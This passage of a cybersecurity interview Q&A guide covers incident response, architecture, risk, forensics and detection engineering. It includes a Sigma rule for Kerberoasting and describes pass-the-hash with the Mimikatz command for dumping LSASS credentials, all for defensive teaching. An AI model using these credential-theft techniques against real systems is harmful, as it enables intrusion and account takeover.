A: Zero Trust is a security model that eliminates implicit trust based on network location. Core principles: (1) Never trust, always verify. (2) Assume breach. (3) Verify explicitly — authenticate and authorize every request. (4) Least privilege access. (5) Microsegmentation.

Implementation pillars:

Identity: Strong authentication (MFA, phishing-resistant like FIDO2), continuous validation, device posture assessment. Every access request authenticated regardless of network location.

Network: Microsegmentation — every workload has its own security perimeter. mTLS between services. Software-defined perimeter (SDP) / BeyondCorp model — no network-level access until authenticated and authorized.

Device: Device health attestation, certificate-based identity, EDR compliance checks. Unmanaged devices get restricted access.

Application: Per-request authorization (not just per-session). Context-aware policies (user identity + device health + location + time + resource sensitivity). API gateway enforcement.

Data: Classification, encryption (at rest, in transit, in use), DLP controls, access logging.

Visibility: Continuous monitoring, SIEM/SOAR integration, behavioral analytics, anomaly detection.

Real implementations: Google BeyondCorp, Microsoft Zero Trust Architecture, NIST SP 800-207. Key technology components: Identity-Aware Proxy (IAP), policy engine + policy administrator + policy enforcement point architecture.

6. Incident Response

Q6.1: Walk through the NIST incident response lifecycle.

A: NIST SP 800-61 defines four phases:

1. Preparation: (0) Build IR team (CSIRT), define roles and communication channels. Establish relationships with legal, PR, law enforcement. Deploy detection tools (SIEM, EDR, NDR). Create playbooks for common incident types. Conduct tabletop exercises. Maintain jump bag (forensic tools, documentation, contact lists). Define severity classification criteria.

2. Detection and Analysis: Identify incidents from alerts (SIEM, EDR, user reports, threat intel). Triage: determine if it's a true positive and assess scope. Establish timeline — build event chronology. Classify severity. Document everything from the first moment. Correlate indicators across sources. Initial scoping: how many systems, what data, what access.

3. Containment, Eradication, Recovery: Containment — short-term (isolate affected systems from network, disable compromised accounts) and long-term (apply patches, change credentials, implement additional monitoring). Evidence preservation BEFORE eradication — forensic images, memory dumps, log collection. Eradication — remove attacker presence (malware, backdoors, persistence mechanisms), patch entry vector. Recovery — restore from known-good backups, rebuild compromised systems, verify integrity. Monitor closely for re-compromise.

4. Post-Incident Activity: Blameless post-mortem within 1-2 weeks. Root cause analysis. Timeline documentation. Lessons learned — what worked, what didn't. Update playbooks, detection rules, and controls. Track remediation items to completion.

Q6.2: You discover a compromised Linux server. What is your first 30 minutes?

A: First priority: preserve volatile evidence before it's lost.

Minutes 0-5 (triage): (1) Do NOT reboot or shut down. (2) Note current time and timezone offset. (3) Document your actions from this point forward. (4) Assess blast radius — what does this server have access to?

Minutes 5-15 (volatile evidence collection): (5) Memory dump: avml or lime kernel module for full memory acquisition. (6) Running processes: ps auxf, /proc/[pid]/exe, /proc/[pid]/cmdline, /proc/[pid]/maps. (7) Network connections: ss -tunap or netstat -tunap (active C2 connections). (8) Open files: lsof. (9) Logged-in users: w, who, last. (10) Environment variables, loaded kernel modules (lsmod).

Minutes 15-25 (containment + non-volatile evidence): (11) Network containment — isolate via firewall rule, VLAN change, or security group modification (don't unplug — maintains connections for investigation). (12) Disk image: dd or dcfldd to create forensic image. (13) Collect logs: /var/log/auth.log, /var/log/syslog, /var/log/secure, application logs, audit logs (/var/log/audit/audit.log). (14) Cron jobs: /etc/crontab, /var/spool/cron/, /etc/cron.d/. (15) Startup scripts: systemd units, init.d scripts, rc.local.

Minutes 25-30 (initial analysis): (16) Check for persistence: new users in /etc/passwd, authorized_keys modifications, unusual SUID binaries (find / -perm -4000), modified system binaries. (17) Check bash history for all users. (18) Timeline analysis: file modification times around suspected compromise time. (19) Report initial findings and recommended next steps.

Q6.3: What is chain of custody and why does it matter?

A: Chain of custody is the documented chronological history of evidence — who collected it, when, how, where it was stored, and who had access to it at every point.

Why it matters: (1) Legal admissibility — evidence without proper chain of custody may be inadmissible in court. (2) Integrity assurance — proves evidence hasn't been tampered with. (3) Accountability — clear record of who handled evidence and when.

Practical implementation: (1) Hash everything at collection time (SHA-256 of forensic images, memory dumps, log files). (2) Document: collector name, date/time, method of collection, tool versions, storage location, purpose. (3) Use write blockers for disk forensics. (4) Store evidence in tamper-evident containers/locations. (5) Log every access to evidence. (6) Transfer evidence with signed receipts. (7) Maintain evidence log spreadsheet or evidence management system.

Digital evidence specifics: Forensic images verified with hash comparison. Memory dumps timestamped and hashed. Live response output captured to write-once media when possible. Screenshots of volatile data with timestamps.

Q6.4: How do you determine the scope and blast radius of a compromise?

A: Start from the known compromised point and work outward:

(1) Credential scope: What accounts were accessible from the compromised system? Service account credentials, SSH keys, API tokens, database passwords. Assume all accessible credentials are compromised. Check credential usage in authentication logs across the environment.

(2) Network scope: What systems could the compromised host reach? Firewall/security group rules, network flow data, VPN access. Check IDS/IPS alerts, proxy logs, DNS logs for lateral movement indicators.

(3) Data scope: What data was accessible? Database contents, file shares, cloud storage. Check data access logs (S3 access logs, database query logs) for exfiltration indicators.

(4) Temporal scope: When did the compromise start? Work backward from detection to initial access. Check: creation time of backdoors, first C2 connection, first unauthorized access in logs. This determines the window of exposure.

(5) Pivot analysis: From each compromised system, repeat the analysis. Build a graph of compromised systems and credentials. Use EDR telemetry, authentication logs (Windows Event IDs 4624/4625, Linux auth.log), and network flow data to trace lateral movement.

(6) Indicators of compromise (IOCs): Extract IOCs from known-compromised systems (file hashes, IPs, domains, mutexes, registry keys) and hunt across the entire environment.

Q6.5: When do you involve law enforcement, legal, and external parties?

A: Legal (immediately): Involve legal counsel as soon as an incident is confirmed. They advise on: notification requirements (GDPR 72-hour rule, state breach notification laws), evidence preservation obligations (litigation hold), privilege considerations (attorney-client privilege on IR communications), regulatory reporting requirements.

Law enforcement (depends): Involve when: nation-state actor suspected, significant financial loss, threat to public safety, regulatory requirement. FBI/CISA for US-based incidents. Consider that law enforcement involvement may become public, may slow response due to evidence requirements, and they may seize equipment.

External IR firm (when): When you lack internal forensic capability, when scope exceeds team capacity, when independent investigation is required (insider threat involving security team), when legal requires third-party validation.

Insurance/broker: Notify cyber insurance carrier early — most policies have notification windows and approved vendor panels.

Regulators: GDPR (72 hours to supervisory authority if personal data breach), HIPAA (60 days to HHS for breaches >500 individuals), PCI DSS (immediately to acquirer and card brands), SEC (4 business days for material cybersecurity incidents via Form 8-K for public companies).

Customers/public: Per legal advice and regulatory requirements. Prepare communications in advance. Be transparent about what happened, what data was affected, and what you're doing about it.

7. Security Architecture

Q7.1: Explain defense in depth. Give a concrete example.

A: Defense in depth layers multiple independent security controls so that failure of one control doesn't result in complete compromise. Each layer assumes the previous layer has failed.

Concrete example — protecting a web application:

Layer 1 (Network perimeter): DDoS protection (Cloudflare, AWS Shield), WAF rules (OWASP CRS), rate limiting.

Layer 2 (Network segmentation): Web servers in DMZ, app servers in private subnet, database in isolated subnet. Security groups restrict traffic to only required ports between tiers.

Layer 3 (Application): Input validation, parameterized queries, output encoding, CSP headers, CSRF tokens, authentication/authorization enforcement.

Layer 4 (Data): Encryption at rest (AES-256-GCM), encryption in transit (TLS 1.3), field-level encryption for PII, database access logging.

Layer 5 (Endpoint): OS hardening (CIS benchmarks), EDR agent, host-based firewall, immutable infrastructure (containers rebuilt, not patched).

Layer 6 (Identity): MFA for all access, short-lived credentials, just-in-time access for admin operations, PAM (Privileged Access Management).

Layer 7 (Detection/Response): SIEM correlation, anomaly detection, automated alerting, incident response playbooks, forensic readiness.

Key principle: Each layer must be independently effective. If the WAF is bypassed, the application's input validation catches the attack. If application code has a bug, database permissions limit damage. If database is breached, encryption limits data exposure.

Q7.2: How do you design for blast radius containment?

A: Blast radius = the maximum impact of a single failure or compromise. Design goal: ensure that compromising one component cannot lead to compromising the entire system.

Techniques: (1) Microsegmentation: Each service/workload in its own network segment with firewall rules allowing only required communication. Compromising service A should not grant network access to service B unless A legitimately calls B.

(2) Least privilege: Every identity (user, service account, role) has minimum required permissions. Use permission boundaries. Avoid wildcard permissions (*). Separate read and write roles.

(3) Isolation boundaries: Separate AWS accounts per environment (dev/staging/prod) and per security domain (security tooling account, log archive account, network account). Use SCPs to enforce guardrails per account.

(4) Credential isolation: Each service has its own credentials (no shared service accounts). Credentials scoped to minimum required resources. Rotate automatically. No long-lived credentials.

(5) Data compartmentalization: Different encryption keys per data classification level, per tenant, per region. Key compromise exposes only data encrypted with that key.

(6) Failure domains: Distribute across availability zones/regions. Circuit breaker patterns prevent cascading failures. Bulkhead patterns isolate resource pools.

(7) Break-glass procedures: Emergency access that bypasses normal controls but generates high-fidelity alerts and requires post-hoc review.

Q7.3: Design a secure multi-tenant SaaS architecture.

A: Data isolation models:

Silo model: Separate database per tenant. Strongest isolation. Highest cost. Used for highly regulated tenants.
Bridge model: Shared database, separate schemas per tenant. Good isolation with lower cost.
Pool model: Shared tables with tenant_id column. Cheapest. Weakest isolation. Requires rigorous row-level security.

Recommended approach for most cases: Pool model with defense in depth:

Application layer: (1) Tenant context injected at authentication and propagated through all layers. (2) All database queries automatically scoped by tenant_id (ORM middleware, PostgreSQL Row Level Security policies). (3) API authorization checks verify resource belongs to requesting tenant. (4) Never expose internal IDs — use UUIDs to prevent enumeration.

Data layer: (5) Row-level security (RLS) in PostgreSQL as database-level enforcement. (6) Separate encryption keys per tenant (envelope encryption: tenant DEK wrapped with KEK in KMS). (7) Audit logging includes tenant_id for all operations.

Infrastructure: (8) Compute isolation for noisy-neighbor protection (dedicated pods per high-tier tenant). (9) Rate limiting per tenant. (10) Separate egress paths if compliance requires.

Testing: Regularly test cross-tenant access — automated tests that verify tenant A cannot access tenant B's data through any API endpoint.

Q7.4: What is a threat model? Walk through the process.

A: Threat modeling systematically identifies and prioritizes threats to a system. Do it during design, revisit when architecture changes.

Process (STRIDE-per-element):

Step 1: Model the system. Create a Data Flow Diagram (DFD) showing: external entities (users, third-party services), processes (application components), data stores (databases, caches), data flows (API calls, file transfers), and trust boundaries (network perimeter, authentication boundary, privilege boundary).

Step 2: Identify threats. For each element in the DFD, apply STRIDE:

Spoofing (identity): Can an attacker impersonate a legitimate entity? Applies to external entities and processes.
Tampering (integrity): Can data be modified in transit or at rest? Applies to data flows and data stores.
Repudiation (non-repudiation): Can a user deny performing an action? Applies to external entities and processes.
Information Disclosure (confidentiality): Can unauthorized parties access data? Applies to data flows, data stores, and processes.
Denial of Service (availability): Can the component be overwhelmed? Applies to processes and data stores.
Elevation of Privilege (authorization): Can an attacker gain higher privileges? Applies to processes.

Step 3: Rate and prioritize. Use DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability) scores 1-10, or CVSS-style rating, or simple High/Medium/Low based on likelihood × impact.

Step 4: Mitigate. For each threat: accept, mitigate (implement control), transfer (insurance, SLA), or eliminate (remove the feature). Document the decision.

Step 5: Validate. Verify mitigations are implemented. Test them. Penetration test against identified threats. Update model as system evolves.

Q7.5: How do you secure a CI/CD pipeline?

A: CI/CD pipelines are high-value targets — they have write access to production and often run with elevated privileges.

Source control: (1) Signed commits (GPG/SSH signatures). (2) Branch protection rules — require PR reviews, no direct pushes to main. (3) CODEOWNERS for security-sensitive files. (4) Pre-commit hooks for secrets scanning.

Build: (5) Hardened, ephemeral build agents — containers destroyed after each build. (6) Pin dependencies by hash (not version). (7) Dependency scanning (SCA) in build pipeline. (8) SAST scanning. (9) Container image scanning (Trivy, Grype). (10) Build provenance — SLSA framework (Supply chain Levels for Software Artifacts). Generate signed build attestations.

Secrets management: (11) No secrets in code or CI config files. Use secrets managers (Vault, AWS Secrets Manager) with short-lived, per-build credentials. (12) Least privilege for pipeline service accounts. (13) Separate secrets per environment.

Deployment: (14) Infrastructure as Code reviewed like application code. (15) Immutable deployments (replace, don't patch). (16) Canary/blue-green deployments with automatic rollback. (17) Deployment requires approval for production.

Runtime: (18) Container runtime security (read-only root filesystem, no privileged containers, Seccomp/AppArmor profiles). (19) Network policies restricting pod-to-pod communication.

Monitoring: (20) Audit logs for all pipeline activities. (21) Alert on: unexpected pipeline executions, pipeline config changes, new service accounts, deploys outside business hours.

8. Risk Management

Q8.1: Explain the FAIR model. How does it differ from qualitative risk assessment?

A: FAIR (Factor Analysis of Information Risk) is a quantitative risk model that expresses risk in financial terms (dollars of expected loss).

Components: Risk = Loss Event Frequency × Loss Magnitude.

Loss Event Frequency = Threat Event Frequency × Vulnerability (probability that a threat event becomes a loss event).
Threat Event Frequency = Contact Frequency × Probability of Action.
Loss Magnitude = Primary Loss (direct costs: response, replacement, fines) + Secondary Loss (reputation damage, customer churn, legal costs).

How it differs from qualitative: Qualitative (High/Medium/Low) is subjective, inconsistent between assessors, and doesn't enable comparison of fundamentally different risks (how do you compare "High" data breach risk vs "Medium" DDoS risk for investment prioritization?). FAIR produces dollar ranges (Monte Carlo simulation): "90% confidence this risk results in $500K-$2M annual loss" — enabling rational investment decisions.

When to use FAIR: Communicating with executives and boards (they understand dollars, not heat maps). Justifying security investments. Comparing risk reduction options. Insurance decisions. When qualitative is OK: Initial triage, rapid risk assessment during threat modeling, when data for quantitative analysis isn't available.

Q8.2: Explain CVSS scoring. What are its limitations?

A: CVSS (Common Vulnerability Scoring System) rates vulnerability severity 0-10. Current version: CVSS 4.0.

Base metrics: Attack Vector (Network/Adjacent/Local/Physical), Attack Complexity (Low/High), Privileges Required (None/Low/High), User Interaction (None/Required), Scope (Changed/Unchanged), Impact on Confidentiality/Integrity/Availability (High/Low/None).

Example: Log4Shell (CVE-2021-44228) = CVSS 10.0 — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Remote, no auth, no interaction, scope change, full CIA impact.

Temporal metrics: Exploit Code Maturity, Remediation Level, Report Confidence. Adjusts score based on current exploit availability and patch status.

Environmental metrics: Modified base metrics for your specific environment. Accounts for compensating controls and asset importance.

Limitations: (1) Base score doesn't account for your environment — a CVSS 9.8 on an air-gapped system is different from one on an internet-facing server. (2) Doesn't account for exploit chain dependencies. (3) Doesn't measure actual risk (probability × impact) — only severity. (4) Score inflation — many CVEs rated Critical when real-world impact is limited. (5) Binary thinking — organizations treat everything >7 as urgent, ignoring context. (6) No business context — doesn't consider what the affected asset does or what data it handles.

What to do instead: Use CVSS as input to prioritization, not the sole determinant. Combine with: asset criticality, exposure (internet-facing?), exploit availability (EPSS score), compensating controls, and business context.

Q8.3: What is a risk register? How do you maintain one?

A: A risk register is a structured inventory of identified risks with their assessment, treatment, and ownership.

Fields per risk entry: Risk ID, description, threat source, vulnerability exploited, affected assets, likelihood (quantified or rated), impact (quantified or rated), inherent risk score (before controls), current controls, residual risk score (after controls), risk treatment (accept/mitigate/transfer/avoid), risk owner (person accountable), mitigation plan and timeline, status, last review date.

Maintenance: (1) Review quarterly at minimum, monthly for high-risk items. (2) Update after: new threat intelligence, incidents, architecture changes, new regulations, control assessments. (3) Risk owners validate their risks each review cycle. (4) Track risk trends over time — are residual scores decreasing? (5) Board/executive reporting: top 10 risks, new risks, risk trend, overdue mitigations.

Common failures: (1) Risk registers that are never updated (snapshot, not living document). (2) No risk owners — risks assigned to "the security team" instead of business owners. (3) All risks rated "Medium" to avoid difficult conversations. (4) No connection between risk register and actual prioritization decisions.

Q8.4: How do you communicate risk to executives and the board?

A: Executives don't care about CVE numbers or technical details. They care about: business impact, financial exposure, competitive risk, regulatory risk, and what you need from them.

Framework: (1) Lead with business impact: "If this risk materializes, we face $2-5M in incident response costs, potential regulatory fines under GDPR Article 83 (up to 4% of annual revenue), and an estimated 15% customer churn based on industry breach data." (2) Contextualize with industry: "Peer companies in our sector experienced 3 material breaches last year with average cost of $4.5M (IBM Cost of a Data Breach Report)." (3) Present options, not mandates: "Option A costs $500K and reduces risk by 80%. Option B costs $200K and reduces risk by 50%. Option C: accept the risk with documented rationale." (4) Use trends: "Our mean time to detect decreased from 14 days to 2 days this quarter. Our open critical vulnerabilities decreased 60%." (5) Be honest about unknowns: "We have high confidence in our application security posture. We have lower confidence in our supply chain risk — this is where I'm requesting additional investment."

Metrics that resonate: Mean time to detect (MTTD), mean time to respond (MTTR), percentage of critical vulnerabilities patched within SLA, security incidents by severity trend, coverage metrics (% of assets with EDR, % of code with SAST coverage, % of employees completing security training).

9. Secure Development Lifecycle

Q9.1: What does a mature Secure SDLC look like?

A: Security integrated at every phase, not bolted on at the end:

Requirements: Security requirements derived from threat model. Abuse cases alongside use cases. Compliance requirements identified (PII handling, encryption requirements, audit logging).

Design: Threat modeling (STRIDE) for all new features and architecture changes. Security architecture review for major changes. Selection of vetted frameworks and libraries.

Implementation: Secure coding training for developers. Pre-commit hooks (secrets scanning). IDE plugins for real-time security feedback. Peer code review with security checklist.

Testing: SAST in CI (every PR). SCA for dependency vulnerabilities (every build). DAST in staging. Manual penetration testing for major releases. Fuzz testing for parsers and protocol handlers.

Deployment: IaC security scanning (Checkov, tfsec). Container image scanning. Signed artifacts. Immutable deployments. Secrets injected at runtime, not build time.

Operations: Runtime application self-protection (RASP) or WAF. Security monitoring and alerting. Vulnerability management SLAs (Critical: 24h, High: 7d, Medium: 30d, Low: 90d). Bug bounty program for continuous external testing.

Feedback loop: Post-incident analysis feeds back into requirements. Vulnerability trends inform training focus. Metrics drive improvement.

Q9.2: How do you handle a zero-day vulnerability in a critical dependency?

A: Hour 0-1 (Assessment): (1) Identify all instances of the affected dependency across all repositories and environments (SCA/SBOM). (2) Determine exploitability — does our usage pattern trigger the vulnerable code path? (3) Assess exposure — is the vulnerable component internet-facing? (4) Check for active exploitation (CISA KEV catalog, threat intel feeds).

Hour 1-4 (Mitigation): (5) If patch available: test and deploy to production via expedited change process. (6) If no patch: deploy compensating controls (WAF rules, network restrictions, feature disable, input validation). (7) IMDSv2-style defense: can we change the environment to make exploitation impossible even without patching the code?

Hour 4-24 (Hardening): (8) Enhanced monitoring — deploy specific detection rules for exploitation attempts. (9) Hunt for evidence of past exploitation (may have been exploited before disclosure). (10) Communicate status to stakeholders.

Post-incident: (11) Review SBOM completeness — did we know about all instances? (12) Evaluate dependency health — should we migrate to an alternative? (13) Update playbook for dependency vulnerability response.

10. Detection Engineering

Q10.1: How do you approach detection engineering for a specific TTP?

A: Start from the attacker's perspective: What must the attacker do that is observable? What artifacts do they create?

Framework: (1) Understand the TTP: Read MITRE ATT&CK technique description. Study real-world examples from threat intel reports. Lab it — execute the technique in a test environment and observe what telemetry is generated.

(2) Identify data sources: What logs capture this activity? Process creation events (Sysmon Event ID 1), network connections (Zeek), file modifications (auditd), authentication events (Windows 4624), API calls (CloudTrail). If the required data source isn't collected, detection is impossible — this is your gap analysis.

(3) Write the detection logic: Start broad (low precision, high recall), then tune. Example for T1003.001 (LSASS memory access): detect processes opening a handle to lsass.exe with memory read permissions. Filter known good (AV, EDR agents). Use Sigma for portable detection logic.

(4) Validate: Test against real attack tools (Mimikatz, nanodump). Test against benign true positives (legitimate software that triggers the rule). Measure: detection rate, false positive rate, time to detect.

(5) Operationalize: Deploy to SIEM/EDR. Create runbook for analysts handling the alert. Set severity based on confidence and impact. Tune false positives with exclusions (document why).

(6) Maintain: Review quarterly. Update for new evasion techniques. Track detection metrics (alerts generated, true positive rate, MTTD).

Q10.2: Write a Sigma rule for detecting Kerberoasting.

title: Kerberoasting - Suspicious TGS Ticket Request
id: a7c5e4b2-3d1f-4e8a-9c6b-2f0d8e7a1b3c
status: experimental
description: >
  Detects excessive Kerberos TGS (Ticket Granting Service) requests
  using RC4 encryption, which may indicate a Kerberoasting attack
  attempting to crack service account passwords offline.
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'  # RC4-HMAC
    Status: '0x0'                 # Success
  filter_machine_accounts:
    ServiceName|endswith: '$'    # Machine accounts use RC4 legitimately
  filter_krbtgt:
    ServiceName: 'krbtgt'
  condition: selection and not filter_machine_accounts and not filter_krbtgt
  # Add count-based threshold in SIEM: >10 events from same source in 5 minutes
falsepositives:
  - Legacy applications requiring RC4 Kerberos tickets
  - Service accounts with SPNs accessed during legitimate batch operations
level: high
tags:
  - attack.t1558.003
  - attack.credential_access

Tuning notes: (1) Threshold on count per source IP/user within time window reduces FP from legitimate service access. (2) Correlate with T1087.002 (account discovery) preceding the TGS requests. (3) Monitor for AES downgrade — if environment supports AES, RC4 requests are more suspicious. (4) Whitelist known service monitoring tools that legitimately query multiple SPNs.

11. Forensics and Evidence

Q11.1: Explain the order of volatility. Why does it matter?

A: Evidence should be collected in order of most volatile to least volatile (RFC 3227):

CPU registers and cache — lost immediately on context switch
Memory (RAM) — running processes, network connections, encryption keys, malware in memory-only. Lost on reboot.
Network state — active connections, ARP cache, routing tables. Changes rapidly.
Running processes — process list, open files, loaded modules.
Disk — files, logs, swap space, slack space. Persists across reboot but can be overwritten.
Remote logging — SIEM, central log servers. Most durable.
Physical evidence — hardware configuration, network cables.

Why it matters: If you start with disk forensics and reboot the system, you lose everything in categories 1-4. Memory often contains the most valuable evidence — decrypted data, malware that never touches disk (fileless attacks), encryption keys, command history. Always capture memory first, then network state, then disk image.

Q11.2: How do you perform memory forensics? What are you looking for?

A: Acquisition: Linux: avml, LiME kernel module, /proc/kcore. Windows: WinPmem, Magnet RAM Capture, DumpIt. Capture to external media or network share — never to the suspect system's disk.

Analysis tool: Volatility 3 (or Rekall). Requires the correct symbol table / profile for the OS version.

What to look for:

(1) Process analysis: pslist, pstree, psscan (finds hidden/unlinked processes). Look for: suspicious process names, processes with no parent, processes spawned from unusual locations (Temp, Downloads), processes injecting into other processes.

(2) Network connections: netscan — active and recently closed connections. Look for: connections to known C2 IPs, unusual ports, established connections from unexpected processes.

(3) Injected code: malfind — detects code injection in process memory (PAGE_EXECUTE_READWRITE regions). hollowfind — detects process hollowing.

(4) DLLs and modules: dlllist, ldrmodules — look for DLLs loaded from unusual paths, unlinked DLLs, DLL search order hijacking.

(5) Handles and registry: handles — open file handles, registry keys, mutexes. hivelist, printkey — registry analysis for persistence.

(6) Command history: cmdscan, consoles — recover command-line history from cmd.exe/PowerShell memory.

(7) Strings extraction: Dump process memory and search for strings — URLs, IPs, credentials, commands.

(8) Timeline: Combine memory artifacts with file system timestamps for comprehensive timeline.

12. Privacy and Compliance

Q12.1: Explain GDPR's key principles and how they affect architecture decisions.

A: Core principles (Article 5): (1) Lawfulness, fairness, transparency. (2) Purpose limitation — collect for specified purposes only. (3) Data minimization — collect only what's necessary. (4) Accuracy — keep data correct and up to date. (5) Storage limitation — don't keep data longer than needed. (6) Integrity and confidentiality — appropriate security measures. (7) Accountability — demonstrate compliance.

Architecture implications: (1) Data inventory: You must know where all personal data is — implement data discovery and classification. (2) Consent management: Need infrastructure to record, track, and honor consent. Must support withdrawal of consent. (3) Right to erasure (Article 17): Architecture must support deletion of a user's data across ALL systems — databases, backups, caches, logs, analytics, third-party integrations. This is architecturally non-trivial. Consider: crypto-shredding (encrypt per-user, delete key to effectively delete data). (4) Data portability (Article 20): Export user data in machine-readable format. (5) Privacy by Design (Article 25): Pseudonymization, encryption, access controls built in from the start. (6) Data Protection Impact Assessment (DPIA, Article 35): Required for high-risk processing. (7) Breach notification (Article 33): 72 hours to supervisory authority — requires incident detection and response capability. (8) Cross-border transfers: Standard Contractual Clauses (SCCs) or adequacy decisions for data leaving EEA.

Q12.2: How does data classification drive security controls?

A: Data classification establishes a taxonomy that maps to control requirements:

Common levels: (1) Public — no impact if disclosed. Marketing materials, public documentation. Controls: integrity protection only. (2) Internal — minor impact if disclosed. Internal communications, non-sensitive business data. Controls: access control, basic encryption in transit. (3) Confidential — significant impact. Customer data, financial data, source code. Controls: encryption at rest and in transit, access logging, need-to-know access, DLP monitoring. (4) Restricted — severe impact. PII, PHI, payment card data, cryptographic keys, credentials. Controls: strong encryption, MFA for access, detailed audit logging, data masking in non-production environments, geographic restrictions.

Architecture mapping: Classification drives: which encryption keys/KMS to use, retention policies, backup requirements, access control granularity, monitoring intensity, incident response severity, geographic placement (data residency), and whether data can flow to third parties.

13. Container and Kubernetes Security

Q13.1: What are the top Kubernetes security risks and mitigations?

A: (1) Exposed API server: K8s API server on port 6443 is the keys to the kingdom. Mitigation: private API endpoint, RBAC, audit logging, network policies restricting access, disable anonymous auth.

(2) Overprivileged containers: Running as root, host PID/network namespace, privileged mode. Mitigation: PodSecurityStandards (Restricted profile), runAsNonRoot: true, readOnlyRootFilesystem: true, drop all capabilities, Seccomp/AppArmor profiles.

(3) Vulnerable images: Base images with known CVEs, malware. Mitigation: image scanning in CI/CD (Trivy, Grype), only allow images from trusted registries (OPA/Kyverno admission policies), minimal base images (distroless, alpine).

(4) Secrets in plain text: Kubernetes Secrets are base64-encoded (not encrypted). Mitigation: encrypt etcd at rest, use external secrets managers (Vault, AWS Secrets Manager) with CSI driver or external-secrets operator.

(5) Network lateral movement: By default, all pods can communicate with all other pods. Mitigation: NetworkPolicies (default deny, explicit allow). Service mesh (Istio, Linkerd) for mTLS between services.

(6) RBAC misconfiguration: Overprivileged service accounts, cluster-admin bindings. Mitigation: least privilege RBAC, no cluster-admin for workloads, audit RBAC bindings regularly, disable automounting of service account tokens when not needed.

(7) Supply chain: Compromised Helm charts, malicious operators. Mitigation: verify chart signatures, review operator permissions, SLSA provenance for container images.

14. Advanced Attacks and Red Team

Q14.1: Explain the differences between penetration testing and red teaming.

A: Penetration testing: Scoped, time-boxed assessment of specific targets. Goal: find as many vulnerabilities as possible within scope. Rules of engagement clearly defined. Typically 1-4 weeks. Tests technical controls. Report is a list of findings with severity ratings.

Red teaming: Adversary simulation against the entire organization. Goal: test detection and response capabilities, not just find vulnerabilities. Objectives-based (e.g., "access CEO email," "exfiltrate customer database"). May include social engineering, physical access. Typically 4-12 weeks. Tests people, processes, and technology. Only a few people know it's happening (minimizes observer effect). Report focuses on attack narrative, detection gaps, and response effectiveness.

Purple teaming: Collaborative exercise where red team executes attacks and blue team attempts to detect them in real time. Iterative — red executes, blue adjusts detection, red tries to evade, repeat. Produces: detection coverage map against MITRE ATT&CK, detection gap list, tuned detection rules.

Q14.2: What is Pass-the-Hash? How do you detect and prevent it?

A: Attack: Windows caches NTLM password hashes in memory (LSASS process). Attacker with local admin on one system dumps hashes (Mimikatz sekurlsa::logonpasswords) and uses the hash directly to authenticate to other systems — no password cracking needed. The NTLM protocol accepts the hash as authentication proof.

Why it works: NTLM challenge-response doesn't require the plaintext password — the hash IS the credential. If the same local admin password is used across multiple systems, one compromise gives access to all of them.

Detection: (1) Monitor for LSASS access (Sysmon Event ID 10, target process lsass.exe). (2) Look for logon type 9 (NewCredentials) with NTLM authentication in Event ID 4624. (3) Detect tools: Mimikatz signatures, suspicious PowerShell, unusual LSASS memory dumps. (4) Behavioral: authentication from unexpected sources, lateral movement patterns.

Prevention: (1) Credential Guard (Windows 10+) — isolates NTLM hashes in virtualization-based security, inaccessible to LSASS. (2) Disable NTLM where possible — enforce Kerberos. (3) Local Administrator Password Solution (LAPS) — unique local admin passwords per system. (4) Privileged Access Workstations (PAWs) — admin credentials only used from hardened systems. (5) Tiered administration — domain admin credentials never touch regular workstations. (6) Protected Users security group — prevents NTLM authentication for members.

Q14.3: Explain supply chain attacks. How do you defend against them?

A: Supply chain attacks compromise a target by infiltrating a trusted third party — software vendor, open source dependency, build system, or hardware manufacturer.

Notable examples: SolarWinds/SUNBURST (2020) — malicious code inserted into SolarWinds Orion build process, deployed to ~18,000 organizations via signed updates. Codecov (2021) — bash uploader script modified to exfiltrate CI/CD environment variables (secrets). xz-utils (2024) — multi-year social engineering campaign to become a trusted maintainer and insert a backdoor into liblzma that compromised SSH authentication. npm/PyPI dependency confusion — attackers publish packages to public registries matching private package names.

Defenses: (1) SBOM (Software Bill of Materials) — know every component in your software. Generate with Syft, CycloneDX. Track against vulnerability databases. (2) Dependency pinning — pin by hash, not version. Prevents substitution. (3) Private registry mirrors — proxy public registries, scan and approve before allowing internal use. Prevents dependency confusion. (4) SLSA framework — require provenance attestations for build artifacts. Verify build integrity. (5) Code signing — verify signatures on all updates. (6) Vendor security assessment — evaluate critical vendors' security practices. (7) Zero trust for vendor connections — minimum required access, monitoring, segmentation. (8) Build reproducibility — ability to rebuild from source and verify output matches distributed binary.

15. Logging, Monitoring, and SIEM

Q15.1: What logs should every organization collect and monitor?

A: Authentication and access: (1) Successful and failed logins (source IP, user, timestamp, MFA used). (2) Privilege escalation events (sudo, runas, role assumption). (3) Account creation, modification, deletion. (4) Group membership changes. (5) Password changes and resets.

Network: (6) DNS queries (source, queried domain, response). (7) Firewall logs (allow and deny). (8) VPN connections. (9) Proxy/web gateway logs (URL, user, category). (10) VPC flow logs / netflow.

Endpoint: (11) Process creation with command line (Sysmon Event 1, auditd execve). (12) File creation/modification in sensitive directories. (13) Service/scheduled task installation. (14) Driver/kernel module loading. (15) PowerShell script block logging.

Application: (16) Authentication events. (17) Authorization failures. (18) Input validation failures. (19) Application errors with stack traces (to security team, not to users). (20) API calls with authentication context.

Cloud: (21) CloudTrail (AWS) / Activity Log (Azure) / Cloud Audit Logs (GCP). (22) Resource creation and modification. (23) IAM policy changes. (24) Data access logs (S3 access logging, Cloud Storage audit logs).

Key principle: Log what you need to investigate. If you can't tell the story of an incident from your logs, you're not collecting enough. Retention: minimum 90 days hot, 1 year cold for most compliance frameworks.

Q15.2: How do you reduce alert fatigue in a SOC?

A: Alert fatigue is the #1 operational problem in security operations. Analysts ignore alerts when the noise is overwhelming.

Root causes: Too many low-fidelity rules, no tuning process, alerts without context, no severity differentiation.

